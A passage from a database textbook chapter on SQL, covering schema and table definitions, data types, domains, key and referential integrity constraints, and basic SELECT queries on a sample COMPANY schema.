differences between various commercial relational DBMS packages. However, if the
user is diligent in using only those features that are part of the standard, and if both
relational systems faithfully support the standard, then conversion between the two
systems should be much simplified. Another advantage of having such a standard is
that users may write statements in a database application program that can access
data stored in two or more relational DBMSs without having to change the database
sublanguage (SQL) if both relational DBMSs support standard SQL.

This chapter presents the main features of the SQL standard for commercial rela-
tional DBMSs. It is beyond the scope of this chapter to discuss the relational algebra
operations, which are very important for understanding the types of requests that
may be specified on a relational database. They are also important for query pro-
cessing and optimization in a relational DBMS. However, the relational algebra
operations are considered to be too technical for most commercial DBMS users
because a query in relational algebra is written as a sequence of operations that,
when executed, produces the required result. Hence, the user must specify how—
that is, in what order—to execute the query operations. On the other hand, the SQL
language provides a higher-level declarative language interface, so the user only

From Chapter 4 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


specifies what the result is to be, leaving the actual optimization and decisions on
how to execute the query to the DBMS. Although SQL includes some features from
relational algebra, it is based to a greater extent on the tuple relational calculus.
However, the SQL syntax is more user-friendly than either of the two formal
languages.

The name SQL is presently expanded as Structured Query Language. Originally,
SQL was called SEQUEL (Structured English QUEry Language) and was designed
and implemented at IBM Research as the interface for an experimental relational
database system called SYSTEM R. SQL is now the standard language for commer-
cial relational DBMSs. A joint effort by the American National Standards Institute
(ANSI) and the International Standards Organization (ISO) has led to a standard
version of SQL (ANSI 1986), called SQL-86 or SQL1. A revised and much expanded
standard called SQL-92 (also referred to as SQL2) was subsequently developed. The
next standard that is well-recognized is SQL:1999, which started out as SQL3. Two
later updates to the standard are SQL:2003 and SQL:2006, which added XML fea-
tures among other updates to the language. Another update in 2008 incorporated
more object database features in SQL. We will try to cover the latest version of SQL
as much as possible.

SQL is a comprehensive database language: It has statements for data definitions,
queries, and updates. Hence, it is both a DDL and a DML. In addition, it has facili-
ties for defining views on the database, for specifying security and authorization, for
defining integrity constraints, and for specifying transaction controls. It also has
rules for embedding SQL statements into a general-purpose programming language
such as Java, COBOL, or C/C++.1

The later SQL standards (starting with SQL:1999) are divided into a core specifica-
tion plus specialized extensions. The core is supposed to be implemented by all
RDBMS vendors that are SQL compliant. The extensions can be implemented as
optional modules to be purchased independently for specific database applications
such as data mining, spatial data, temporal data, data warehousing, online analytical
processing (OLAP), multimedia data, and so on.

Because SQL is very important (and quite large), we cannot cover all its features in
this chapter. Section 1 describes the SQL DDL commands for creating schemas and
tables, and gives an overview of the basic data types in SQL. Section 2 presents how
basic constraints such as key and referential integrity are specified. Section 3
describes the basic SQL constructs for specifying retrieval queries, and Section 4
describes the SQL commands for insertion, deletion, and data updates.

Not covered are the more complex SQL retrieval queries, as well as the ALTER com-
mands for changing the schema, the CREATE ASSERTION statement, which allows
the specification of more general constraints on the database, the concept of trig-
gers, and the SQL facility for defining views on the database. Views are also called

1Originally, SQL had statements for creating and dropping indexes on the files that represent relations,
but these have been dropped from the SQL standard for some time.


virtual or derived tables because they present the user with what appear to be tables;
however, the information in those tables is derived from previously defined tables.

Section 5 lists some SQL features not detailed in this chapter; these include transac-
tion control, security/authorization, active databases (triggers), object-oriented fea-
tures, and online analytical processing (OLAP) features. Section 6 summarizes the
chapter.

1 SQL Data Definition and Data Types
SQL uses the terms table, row, and column for the formal relational model terms
relation, tuple, and attribute, respectively. We will use the corresponding terms inter-
changeably. The main SQL command for data definition is the CREATE statement,
which can be used to create schemas, tables (relations), and domains (as well as
other constructs such as views, assertions, and triggers). Before we describe the rel-
evant CREATE statements, we discuss schema and catalog concepts in Section 1.1 to
place our discussion in perspective. Section 1.2 describes how tables are created, and
Section 1.3 describes the most important data types available for attribute specifica-
tion. Because the SQL specification is very large, we give a description of the most
important features. Further details can be found in the various SQL standards doc-
uments (see end-of-chapter bibliographic notes).

1.1 Schema and Catalog Concepts in SQL
Early versions of SQL did not include the concept of a relational database schema; all
tables (relations) were considered part of the same schema. The concept of an SQL
schema was incorporated starting with SQL2 in order to group together tables and
other constructs that belong to the same database application. An SQL schema is
identified by a schema name, and includes an authorization identifier to indicate
the user or account who owns the schema, as well as descriptors for each element in
the schema. Schema elements include tables, constraints, views, domains, and other
constructs (such as authorization grants) that describe the schema. A schema is cre-
ated via the CREATE SCHEMA statement, which can include all the schema elements’
definitions. Alternatively, the schema can be assigned a name and authorization
identifier, and the elements can be defined later. For example, the following state-
ment creates a schema called COMPANY, owned by the user with authorization iden-
tifier ‘Jsmith’. Note that each statement in SQL ends with a semicolon.

CREATE SCHEMA COMPANY AUTHORIZATION ‘Jsmith’;

In general, not all users are authorized to create schemas and schema elements. The
privilege to create schemas, tables, and other constructs must be explicitly granted
to the relevant user accounts by the system administrator or DBA.


In addition to the concept of a schema, SQL uses the concept of a catalog—a named
collection of schemas in an SQL environment. An SQL environment is basically an
installation of an SQL-compliant RDBMS on a computer system.2 A catalog always
contains a special schema called INFORMATION_SCHEMA, which provides informa-
tion on all the schemas in the catalog and all the element descriptors in these
schemas. Integrity constraints such as referential integrity can be defined between
relations only if they exist in schemas within the same catalog. Schemas within the
same catalog can also share certain elements, such as domain definitions.

1.2 The CREATE TABLE Command in SQL
The CREATE TABLE command is used to specify a new relation by giving it a name
and specifying its attributes and initial constraints. The attributes are specified first,
and each attribute is given a name, a data type to specify its domain of values, and
any attribute constraints, such as NOT NULL. The key, entity integrity, and referen-
tial integrity constraints can be specified within the CREATE TABLE statement after
the attributes are declared, or they can be added later using the ALTER TABLE com-
mand. Figure 1 shows sample data definition statements in SQL for the COMPANY
relational database schema shown in Figure A.1 in Appendix: Figures at the end of
this chapter.

Typically, the SQL schema in which the relations are declared is implicitly specified
in the environment in which the CREATE TABLE statements are executed.
Alternatively, we can explicitly attach the schema name to the relation name, sepa-
rated by a period. For example, by writing

CREATE TABLE COMPANY.EMPLOYEE …

rather than

CREATE TABLE EMPLOYEE …

as in Figure 1, we can explicitly (rather than implicitly) make the EMPLOYEE table
part of the COMPANY schema.

The relations declared through CREATE TABLE statements are called base tables (or
base relations); this means that the relation and its tuples are actually created and
stored as a file by the DBMS. Base relations are distinguished from virtual relations,
created through the CREATE VIEW statement, which may or may not correspond to
an actual physical file. In SQL, the attributes in a base table are considered to be
ordered in the sequence in which they are specified in the CREATE TABLE statement.
However, rows (tuples) are not considered to be ordered within a relation.

It is important to note that in Figure 1, there are some foreign keys that may cause
errors because they are specified either via circular references or because they refer
to a table that has not yet been created. For example, the foreign key Super_ssn in
the EMPLOYEE table is a circular reference because it refers to the table itself. The
foreign key Dno in the EMPLOYEE table refers to the DEPARTMENT table, which has

2SQL also includes the concept of a cluster of catalogs within an environment.


CREATE TABLE EMPLOYEE
( Fname          VARCHAR(15)    NOT NULL,
  Minit          CHAR,
  Lname          VARCHAR(15)    NOT NULL,
  Ssn            CHAR(9)        NOT NULL,
  Bdate          DATE,
  Address        VARCHAR(30),
  Sex            CHAR,
  Salary         DECIMAL(10,2),
  Super_ssn      CHAR(9),
  Dno            INT            NOT NULL,
PRIMARY KEY (Ssn),
FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn),
FOREIGN KEY (Dno) REFERENCES DEPARTMENT(Dnumber) );

CREATE TABLE DEPARTMENT
( Dname          VARCHAR(15)    NOT NULL,
  Dnumber        INT            NOT NULL,
  Mgr_ssn        CHAR(9)        NOT NULL,
  Mgr_start_date DATE,
PRIMARY KEY (Dnumber),
UNIQUE (Dname),
FOREIGN KEY (Mgr_ssn) REFERENCES EMPLOYEE(Ssn) );

CREATE TABLE DEPT_LOCATIONS
( Dnumber        INT            NOT NULL,
  Dlocation      VARCHAR(15)    NOT NULL,
PRIMARY KEY (Dnumber, Dlocation),
FOREIGN KEY (Dnumber) REFERENCES DEPARTMENT(Dnumber) );

CREATE TABLE PROJECT
( Pname          VARCHAR(15)    NOT NULL,
  Pnumber        INT            NOT NULL,
  Plocation      VARCHAR(15),
  Dnum           INT            NOT NULL,
PRIMARY KEY (Pnumber),
UNIQUE (Pname),
FOREIGN KEY (Dnum) REFERENCES DEPARTMENT(Dnumber) );

CREATE TABLE WORKS_ON
( Essn           CHAR(9)        NOT NULL,
  Pno            INT            NOT NULL,
  Hours          DECIMAL(3,1)   NOT NULL,
PRIMARY KEY (Essn, Pno),
FOREIGN KEY (Essn) REFERENCES EMPLOYEE(Ssn),
FOREIGN KEY (Pno) REFERENCES PROJECT(Pnumber) );

CREATE TABLE DEPENDENT
( Essn           CHAR(9)        NOT NULL,
  Dependent_name VARCHAR(15)    NOT NULL,
  Sex            CHAR,
  Bdate          DATE,
  Relationship   VARCHAR(8),
PRIMARY KEY (Essn, Dependent_name),
FOREIGN KEY (Essn) REFERENCES EMPLOYEE(Ssn) );

Figure 1
SQL CREATE TABLE data definition statements for defining the COMPANY schema from Figure A.1.


not been created yet. To deal with this type of problem, these constraints can be left
out of the initial CREATE TABLE statement, and then added later using the ALTER
TABLE statement. We displayed all the foreign keys in Figure 1 to show the complete
COMPANY schema in one place.
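
One possible sequence, sketched here under the assumption that EMPLOYEE is created first without these two foreign keys and that DEPARTMENT is created next, is to add the constraints afterward with ALTER TABLE; the constraint names follow those used later in Figure 2.

ALTER TABLE EMPLOYEE ADD CONSTRAINT EMPSUPERFK
    FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn);    -- the circular reference, added once EMPLOYEE exists
ALTER TABLE EMPLOYEE ADD CONSTRAINT EMPDEPTFK
    FOREIGN KEY (Dno) REFERENCES DEPARTMENT(Dnumber);    -- added once DEPARTMENT has been created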

1.3 Attribute Data Types and Domains in SQL
The basic data types available for attributes include numeric, character string, bit
string, Boolean, date, and time.

■ Numeric data types include integer numbers of various sizes (INTEGER or
INT, and SMALLINT) and floating-point (real) numbers of various precision
(FLOAT or REAL, and DOUBLE PRECISION). Formatted numbers can be
declared by using DECIMAL(i,j)—or DEC(i,j) or NUMERIC(i,j)—where i, the
precision, is the total number of decimal digits and j, the scale, is the number
of digits after the decimal point. The default for scale is zero, and the default
for precision is implementation-defined.

■ Character-string data types are either fixed length—CHAR(n) or
CHARACTER(n), where n is the number of characters—or varying length—
VARCHAR(n) or CHAR VARYING(n) or CHARACTER VARYING(n), where n is
the maximum number of characters. When specifying a literal string value, it
is placed between single quotation marks (apostrophes), and it is case sensi-
tive (a distinction is made between uppercase and lowercase).3 For fixed-
length strings, a shorter string is padded with blank characters to the right.
For example, if the value ‘Smith’ is for an attribute of type CHAR(10), it is
padded with five blank characters to become ‘Smith ’ if needed. Padded
blanks are generally ignored when strings are compared. For comparison
purposes, strings are considered ordered in alphabetic (or lexicographic)
order; if a string str1 appears before another string str2 in alphabetic order,
then str1 is considered to be less than str2.4 There is also a concatenation
operator denoted by || (double vertical bar) that can concatenate two strings
in SQL. For example, ‘abc’ || ‘XYZ’ results in a single string ‘abcXYZ’. Another
variable-length string data type called CHARACTER LARGE OBJECT or
CLOB is also available to specify columns that have large text values, such as
documents. The CLOB maximum length can be specified in kilobytes (K),
megabytes (M), or gigabytes (G). For example, CLOB(20M) specifies a max-
imum length of 20 megabytes.

■ Bit-string data types are either of fixed length n—BIT(n)—or varying
length—BIT VARYING(n), where n is the maximum number of bits. The
default for n, the length of a character string or bit string, is 1. Literal bit
strings are placed between single quotes but preceded by a B to distinguish

3This is not the case with SQL keywords, such as CREATE or CHAR. With keywords, SQL is case insen-
sitive, meaning that SQL treats uppercase and lowercase letters as equivalent in keywords.
4For nonalphabetic characters, there is a defined order.


them from character strings; for example, B‘10101’.5 Another variable-length
bitstring data type called BINARY LARGE OBJECT or BLOB is also available
to specify columns that have large binary values, such as images. As for
CLOB, the maximum length of a BLOB can be specified in kilobits (K),
megabits (M), or gigabits (G). For example, BLOB(30G) specifies a maxi-
mum length of 30 gigabits.

■ A Boolean data type has the traditional values of TRUE or FALSE. In SQL,
because of the presence of NULL values, a three-valued logic is used, so a
third possible value for a Boolean data type is UNKNOWN.

■ The DATE data type has ten positions, and its components are YEAR, MONTH, and DAY in the form YYYY-MM-DD. The TIME data type has at least eight positions, with the components HOUR, MINUTE, and SECOND in the form HH:MM:SS. Only valid dates and times should be allowed by the SQL implementation. This implies that months should be between 1 and 12 and days must be between 1 and 31; furthermore, a day should be a valid day for the corresponding month. The < (less than) comparison can be used with dates or times—an earlier date is considered to be smaller than a later date, and similarly with time. Literal values are represented by single-quoted strings preceded by the keyword DATE or TIME; for example, DATE ‘2008-09-27’ or TIME ‘09:12:47’. In addition, a data type TIME(i), where i is called time fractional seconds precision, specifies i + 1 additional positions for TIME—one position for an additional period (.) separator character, and i positions for specifying decimal fractions of a second. A TIME WITH TIME ZONE data type includes an additional six positions for specifying the displacement from the standard universal time zone, which is in the range +13:00 to –12:59 in units of HOURS:MINUTES. If WITH TIME ZONE is not included, the default is the local time zone for the SQL session.

Some additional data types are discussed below. The list of types discussed here is not exhaustive; different implementations have added more data types to SQL.

■ A timestamp data type (TIMESTAMP) includes the DATE and TIME fields, plus a minimum of six positions for decimal fractions of seconds and an optional WITH TIME ZONE qualifier. Literal values are represented by single-quoted strings preceded by the keyword TIMESTAMP, with a blank space between the date and the time; for example, TIMESTAMP ‘2008-09-27 09:12:47.648302’.

■ Another data type related to DATE, TIME, and TIMESTAMP is the INTERVAL data type. This specifies an interval—a relative value that can be used to increment or decrement an absolute value of a date, time, or timestamp. Intervals are qualified to be either YEAR/MONTH intervals or DAY/TIME intervals.

5Bit strings whose length is a multiple of 4 can be specified in hexadecimal notation, where the literal string is preceded by X and each hexadecimal character represents 4 bits.

The format of DATE, TIME, and TIMESTAMP can be considered as a special type of string. Hence, they can generally be used in string comparisons by being cast (or coerced or converted) into the equivalent strings.

It is possible to specify the data type of each attribute directly, as in Figure 1; alternatively, a domain can be declared, and the domain name used with the attribute specification. This makes it easier to change the data type for a domain that is used by numerous attributes in a schema, and it improves schema readability. For example, we can create a domain SSN_TYPE by the following statement:

CREATE DOMAIN SSN_TYPE AS CHAR(9);

We can use SSN_TYPE in place of CHAR(9) in Figure 1 for the attributes Ssn and Super_ssn of EMPLOYEE, Mgr_ssn of DEPARTMENT, Essn of WORKS_ON, and Essn of DEPENDENT. A domain can also have an optional default specification via a DEFAULT clause, as we discuss later for attributes. Notice that domains may not be available in some implementations of SQL.

2 Specifying Constraints in SQL
This section describes the basic constraints that can be specified in SQL as part of table creation. These include key and referential integrity constraints, restrictions on attribute domains and NULLs, and constraints on individual tuples within a relation.

2.1 Specifying Attribute Constraints and Attribute Defaults
Because SQL allows NULLs as attribute values, a constraint NOT NULL may be specified if NULL is not permitted for a particular attribute. This is always implicitly specified for the attributes that are part of the primary key of each relation, but it can be specified for any other attributes whose values are required not to be NULL, as shown in Figure 1.

It is also possible to define a default value for an attribute by appending the clause DEFAULT <value> to an attribute definition. The default value is included in any new tuple if an explicit value is not provided for that attribute. Figure 2 illustrates an example of specifying a default manager for a new department and a default department for a new employee. If no default clause is specified, the default value is NULL for attributes that do not have the NOT NULL constraint.
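
As a compact, hedged illustration of several of these data types, the DEFAULT clause, and a declared domain, the following sketch declares a hypothetical audit table; the table and attribute names are ours and are not part of the COMPANY schema.

CREATE DOMAIN SSN_TYPE AS CHAR(9);

CREATE TABLE EMP_AUDIT                              -- hypothetical table, for illustration only
( Audit_id     INT NOT NULL,
  Emp_ssn      SSN_TYPE NOT NULL,                   -- attribute typed by the domain declared above
  Change_note  VARCHAR(200) DEFAULT ‘none’,         -- default value used when no value is supplied
  Old_salary   DECIMAL(10,2),                       -- precision 10, scale 2
  Changed_on   TIMESTAMP,                           -- stores both the date and the time of the change
  PRIMARY KEY (Audit_id) );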

Another type of constraint can restrict attribute or domain values using the CHECK
clause following an attribute or domain definition.6 For example, suppose that
department numbers are restricted to integer numbers between 1 and 20; then, we
can change the attribute declaration of Dnumber in the DEPARTMENT table (see
Figure 1) to the following:

Dnumber INT NOT NULL CHECK (Dnumber > 0 AND Dnumber < 21);

6The CHECK clause can also be used for other purposes, as we shall see.

CREATE TABLE EMPLOYEE
( . . . ,
Dno INT NOT NULL DEFAULT 1,
CONSTRAINT EMPPK
PRIMARY KEY (Ssn),
CONSTRAINT EMPSUPERFK
FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn)
ON DELETE SET NULL ON UPDATE CASCADE,
CONSTRAINT EMPDEPTFK
FOREIGN KEY (Dno) REFERENCES DEPARTMENT(Dnumber)
ON DELETE SET DEFAULT ON UPDATE CASCADE );

CREATE TABLE DEPARTMENT
( . . . ,
Mgr_ssn CHAR(9) NOT NULL DEFAULT ‘888665555’,
. . . ,
CONSTRAINT DEPTPK
PRIMARY KEY (Dnumber),
CONSTRAINT DEPTSK
UNIQUE (Dname),
CONSTRAINT DEPTMGRFK
FOREIGN KEY (Mgr_ssn) REFERENCES EMPLOYEE(Ssn)
ON DELETE SET DEFAULT ON UPDATE CASCADE );

CREATE TABLE DEPT_LOCATIONS
( . . . ,
PRIMARY KEY (Dnumber, Dlocation),
FOREIGN KEY (Dnumber) REFERENCES DEPARTMENT(Dnumber)
ON DELETE CASCADE ON UPDATE CASCADE );

Figure 2
Example illustrating how default attribute values and referential integrity triggered actions are specified in SQL.

The CHECK clause can also be used in conjunction with the CREATE DOMAIN statement. For example, we can write the following statement:

CREATE DOMAIN D_NUM AS INTEGER CHECK (D_NUM > 0 AND D_NUM < 21);

We can then use the created domain D_NUM as the attribute type for all attributes that refer to department numbers in Figure 1, such as Dnumber of DEPARTMENT, Dnum of PROJECT, Dno of EMPLOYEE, and so on.

2.2 Specifying Key and Referential Integrity Constraints
Because keys and referential integrity constraints are very important, there are special clauses within the CREATE TABLE statement to specify them. Some examples to illustrate the specification of keys and referential integrity are shown in Figure 1.7

The PRIMARY KEY clause specifies one or more attributes that make up the primary key of a relation. If a primary key has a single attribute, the clause can follow the attribute directly. For example, the primary key of DEPARTMENT can be specified as follows (instead of the way it is specified in Figure 1):

Dnumber INT PRIMARY KEY;

7Key and referential integrity constraints were not included in early versions of SQL. In some earlier implementations, keys were specified implicitly at the internal level via the CREATE INDEX command.

The UNIQUE clause specifies alternate (secondary) keys, as illustrated in the DEPARTMENT and PROJECT table declarations in Figure 1. The UNIQUE clause can also be specified directly for a secondary key if the secondary key is a single attribute, as in the following example:

Dname VARCHAR(15) UNIQUE;

Referential integrity is specified via the FOREIGN KEY clause, as shown in Figure 1. A referential integrity constraint can be violated when tuples are inserted or deleted, or when a foreign key or primary key attribute value is modified. The default action that SQL takes for an integrity violation is to reject the update operation that will cause a violation, which is known as the RESTRICT option. However, the schema designer can specify an alternative action to be taken by attaching a referential triggered action clause to any foreign key constraint. The options include SET NULL, CASCADE, and SET DEFAULT. An option must be qualified with either ON DELETE or ON UPDATE. We illustrate this with the examples shown in Figure 2. Here, the database designer chooses ON DELETE SET NULL and ON UPDATE CASCADE for the foreign key Super_ssn of EMPLOYEE. This means that if the tuple for a supervising employee is deleted, the value of Super_ssn is automatically set to NULL for all employee tuples that were referencing the deleted employee tuple. On the other hand, if the Ssn value for a supervising employee is updated (say, because it was entered incorrectly), the new value is cascaded to Super_ssn for all employee tuples referencing the updated employee tuple.8

In general, the action taken by the DBMS for SET NULL or SET DEFAULT is the same for both ON DELETE and ON UPDATE: the value of the affected referencing attributes is changed to NULL for SET NULL and to the specified default value of the referencing attribute for SET DEFAULT. The action for CASCADE ON DELETE is to delete all the referencing tuples, whereas the action for CASCADE ON UPDATE is to change the value of the referencing foreign key attribute(s) to the updated (new) primary key value for all the referencing tuples. It is the responsibility of the database designer to choose the appropriate action and to specify it in the database schema. As a general rule, the CASCADE option is suitable for “relationship” relations, such as WORKS_ON; for relations that represent multivalued attributes, such as DEPT_LOCATIONS; and for relations that represent weak entity types, such as DEPENDENT.

8Notice that the foreign key Super_ssn in the EMPLOYEE table is a circular reference and hence may have to be added later as a named constraint using the ALTER TABLE statement, as we discussed at the end of Section 1.2.

2.3 Giving Names to Constraints
Figure 2 also illustrates how a constraint may be given a constraint name, following the keyword CONSTRAINT. The names of all constraints within a particular schema must be unique. A constraint name is used to identify a particular constraint in case the constraint must be dropped later and replaced with another constraint. Giving names to constraints is optional.

2.4 Specifying Constraints on Tuples Using CHECK
In addition to key and referential integrity constraints, which are specified by special keywords, other table constraints can be specified through additional CHECK clauses at the end of a CREATE TABLE statement. These can be called tuple-based constraints because they apply to each tuple individually and are checked whenever a tuple is inserted or modified. For example, suppose that the DEPARTMENT table in Figure 1 had an additional attribute Dept_create_date, which stores the date when the department was created. Then we could add the following CHECK clause at the end of the CREATE TABLE statement for the DEPARTMENT table to make sure that a manager’s start date is later than the department creation date:

CHECK (Dept_create_date <= Mgr_start_date);

The CHECK clause can also be used to specify more general constraints using the CREATE ASSERTION statement of SQL. We do not discuss this in this chapter because it requires the full power of queries, which are not completely fleshed out here.

3 Basic Retrieval Queries in SQL
SQL has one basic statement for retrieving information from a database: the SELECT statement. The SELECT statement is not the same as the SELECT operation of relational algebra. There are many options and flavors to the SELECT statement in SQL, so we will introduce its features gradually. We will use sample queries specified on the schema of Figure A.2 and will refer to the sample database state shown in Figure A.3 to show the results of some of the sample queries.

In this section, we present the features of SQL for simple retrieval queries. Before proceeding, we must point out an important distinction between SQL and the formal relational model: SQL allows a table (relation) to have two or more tuples that are identical in all their attribute values. Hence, in general, an SQL table is not a set of tuples, because a set does not allow two identical members; rather, it is a multiset (sometimes called a bag) of tuples. Some SQL relations are constrained to be sets because a key constraint has been declared or because the DISTINCT option has been used with the SELECT statement (described later in this section). We should be aware of this distinction as we discuss the examples.

3.1 The SELECT-FROM-WHERE Structure of Basic SQL Queries
Queries in SQL can be very complex. We will start with simple queries, and then progress to more complex ones in a step-by-step manner. The basic form of the SELECT statement, sometimes called a mapping or a select-from-where block, is formed of the three clauses SELECT, FROM, and WHERE and has the following form:9

SELECT <attribute list>
FROM <table list>
WHERE <condition>;

where

■ <attribute list> is a list of attribute names whose values are to be retrieved by the query.
■ <table list> is a list of the relation names required to process the query.
■ <condition> is a conditional (Boolean) expression that identifies the tuples to be retrieved by the query.

In SQL, the basic logical comparison operators for comparing attribute values with
one another and with literal constants are =, <, <=, >, >=, and <>. These corre-
spond to the relational algebra operators =, <, ≤, >, ≥, and ≠, respectively, and to the
C/C++ programming language operators ==, <, <=, >, >=, and !=. The main syntac-
tic difference is the not equal operator. SQL has additional comparison operators
that we will present gradually.

We illustrate the basic SELECT statement in SQL with some sample queries.

Query 0. Retrieve the birth date and address of the employee(s) whose name
is ‘John B. Smith’.

Q0: SELECT Bdate, Address
FROM EMPLOYEE
WHERE Fname=‘John’ AND Minit=‘B’ AND Lname=‘Smith’;

This query involves only the EMPLOYEE relation listed in the FROM clause. The
query selects the individual EMPLOYEE tuples that satisfy the condition of the
WHERE clause, then projects the result on the Bdate and Address attributes listed in
the SELECT clause.

The SELECT clause of SQL specifies the attributes whose values are to be retrieved,
which are called the projection attributes, and the WHERE clause specifies the
Boolean condition that must be true for any retrieved tuple, which is known as the
selection condition. Figure 3(a) shows the result of query Q0 on the database of
Figure A.3.

We can think of an implicit tuple variable or iterator in the SQL query ranging or
looping over each individual tuple in the EMPLOYEE table and evaluating the condi-
tion in the WHERE clause. Only those tuples that satisfy the condition—that is,

9The SELECT and FROM clauses are required in all SQL queries. The WHERE is optional (see Section
3.3).


those tuples for which the condition evaluates to TRUE after substituting their corresponding attribute values—are selected.

Figure 3
Results of SQL queries when applied to the COMPANY database state shown in Figure A.3. (a) Q0. (b) Q1. (c) Q2. (d) Q8. (e) Q9. (f) Q10. (g) Q1C.

Query 1. Retrieve the name and address of all employees who work for the
‘Research’ department.

Q1: SELECT Fname, Lname, Address
FROM EMPLOYEE, DEPARTMENT
WHERE Dname=‘Research’ AND Dnumber=Dno;

In the WHERE clause of Q1, the condition Dname = ‘Research’ is a selection condi-
tion that chooses the particular tuple of interest in the DEPARTMENT table, because
Dname is an attribute of DEPARTMENT. The condition Dnumber = Dno is called a
join condition, because it combines two tuples: one from DEPARTMENT and one
from EMPLOYEE, whenever the value of Dnumber in DEPARTMENT is equal to the
value of Dno in EMPLOYEE. The result of query Q1 is shown in Figure 3(b). In gen-
eral, any number of selection and join conditions may be specified in a single SQL
query.

A query that involves only selection and join conditions plus projection attributes is
known as a select-project-join query. The next example is a select-project-join
query with two join conditions.

Query 2. For every project located in ‘Stafford’, list the project number, the
controlling department number, and the department manager’s last name,
address, and birth date.

Q2: SELECT Pnumber, Dnum, Lname, Address, Bdate
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND Mgr_ssn=Ssn AND

Plocation=‘Stafford’;

The join condition Dnum = Dnumber relates a project tuple to its controlling depart-
ment tuple, whereas the join condition Mgr_ssn = Ssn relates the controlling depart-
ment tuple to the employee tuple who manages that department. Each tuple in the
result will be a combination of one project, one department, and one employee that
satisfies the join conditions. The projection attributes are used to choose the attrib-
utes to be displayed from each combined tuple. The result of query Q2 is shown in
Figure 3(c).

3.2 Ambiguous Attribute Names, Aliasing,
Renaming, and Tuple Variables

In SQL, the same name can be used for two (or more) attributes as long as the attrib-
utes are in different relations. If this is the case, and a multitable query refers to two or
more attributes with the same name, we must qualify the attribute name with the
relation name to prevent ambiguity. This is done by prefixing the relation name to
the attribute name and separating the two by a period. To illustrate this, suppose that
in Figures A.2 and A.3 the Dno and Lname attributes of the EMPLOYEE relation were


called Dnumber and Name, and the Dname attribute of DEPARTMENT was also called
Name; then, to prevent ambiguity, query Q1 would be rephrased as shown in Q1A. We
must prefix the attributes Name and Dnumber in Q1A to specify which ones we are
referring to, because the same attribute names are used in both relations:

Q1A: SELECT Fname, EMPLOYEE.Name, Address
FROM EMPLOYEE, DEPARTMENT
WHERE DEPARTMENT.Name=‘Research’ AND

DEPARTMENT.Dnumber=EMPLOYEE.Dnumber;

Fully qualified attribute names can be used for clarity even if there is no ambiguity
in attribute names. Q1 is shown in this manner as Q1′ below. We can also create
an alias for each table name to avoid repeated typing of long table names (see Q8
below).

Q1′: SELECT EMPLOYEE.Fname, EMPLOYEE.Lname, EMPLOYEE.Address
FROM EMPLOYEE, DEPARTMENT
WHERE DEPARTMENT.Dname=‘Research’ AND
DEPARTMENT.Dnumber=EMPLOYEE.Dno;

The ambiguity of attribute names also arises in the case of queries that refer to the
same relation twice, as in the following example.

Query 8. For each employee, retrieve the employee’s first and last name and
the first and last name of his or her immediate supervisor.

Q8: SELECT E.Fname, E.Lname, S.Fname, S.Lname
FROM EMPLOYEE AS E, EMPLOYEE AS S
WHERE E.Super_ssn=S.Ssn;

In this case, we are required to declare alternative relation names E and S, called
aliases or tuple variables, for the EMPLOYEE relation. An alias can follow the key-
word AS, as shown in Q8, or it can directly follow the relation name—for example,
by writing EMPLOYEE E, EMPLOYEE S in the FROM clause of Q8. It is also possible
to rename the relation attributes within the query in SQL by giving them aliases.
For example, if we write

EMPLOYEE AS E(Fn, Mi, Ln, Ssn, Bd, Addr, Sex, Sal, Sssn, Dno)

in the FROM clause, Fn becomes an alias for Fname, Mi for Minit, Ln for Lname, and so
on.
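
A minimal sketch of how such renamed attributes could then be referenced in the rest of a query follows; the alias E and the shortened names are taken from the renaming above.

SELECT E.Fn, E.Ln
FROM   EMPLOYEE AS E(Fn, Mi, Ln, Ssn, Bd, Addr, Sex, Sal, Sssn, Dno)
WHERE  E.Dno=5;                                     -- Dno keeps its original name in this renaming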

In Q8, we can think of E and S as two different copies of the EMPLOYEE relation; the
first, E, represents employees in the role of supervisees or subordinates; the second,
S, represents employees in the role of supervisors. We can now join the two copies.
Of course, in reality there is only one EMPLOYEE relation, and the join condition is
meant to join the relation with itself by matching the tuples that satisfy the join con-
dition E.Super_ssn = S.Ssn. Notice that this is an example of a one-level recursive
query. In earlier versions of SQL, it was not possible to specify a general recursive


query, with an unknown number of levels, in a single SQL statement. A construct
for specifying recursive queries has been incorporated into SQL:1999.
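
As a hedged sketch of that SQL:1999 construct (the exact syntax and the degree of support vary across systems), the following WITH RECURSIVE query retrieves the Ssn of every direct or indirect supervisee of the employee with Ssn ‘888665555’:

WITH RECURSIVE SUPERVISED (Ssn) AS
 ( SELECT Ssn FROM EMPLOYEE WHERE Super_ssn=‘888665555’    -- direct supervisees
   UNION
   SELECT E.Ssn
   FROM   EMPLOYEE E, SUPERVISED S
   WHERE  E.Super_ssn=S.Ssn )                              -- supervisees of supervisees, and so on
SELECT Ssn FROM SUPERVISED;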

The result of query Q8 is shown in Figure 3(d). Whenever one or more aliases are
given to a relation, we can use these names to represent different references to that
same relation. This permits multiple references to the same relation within a query.

We can use this alias-naming mechanism in any SQL query to specify tuple vari-
ables for every table in the WHERE clause, whether or not the same relation needs to
be referenced more than once. In fact, this practice is recommended since it results
in queries that are easier to comprehend. For example, we could specify query Q1 as
in Q1B:

Q1B: SELECT E.Fname, E.LName, E.Address
FROM EMPLOYEE E, DEPARTMENT D
WHERE D.DName=‘Research’ AND D.Dnumber=E.Dno;

3.3 Unspecified WHERE Clause
and Use of the Asterisk

We discuss two more features of SQL here. A missing WHERE clause indicates no
condition on tuple selection; hence, all tuples of the relation specified in the FROM
clause qualify and are selected for the query result. If more than one relation is spec-
ified in the FROM clause and there is no WHERE clause, then the CROSS
PRODUCT—all possible tuple combinations—of these relations is selected. For
example, Query 9 selects all EMPLOYEE Ssns (Figure 3(e)), and Query 10 selects all
combinations of an EMPLOYEE Ssn and a DEPARTMENT Dname, regardless of
whether the employee works for the department or not (Figure 3(f)).

Queries 9 and 10. Select all EMPLOYEE Ssns (Q9) and all combinations of
EMPLOYEE Ssn and DEPARTMENT Dname (Q10) in the database.

Q9: SELECT Ssn
FROM EMPLOYEE;

Q10: SELECT Ssn, Dname
FROM EMPLOYEE, DEPARTMENT;

It is extremely important to specify every selection and join condition in the
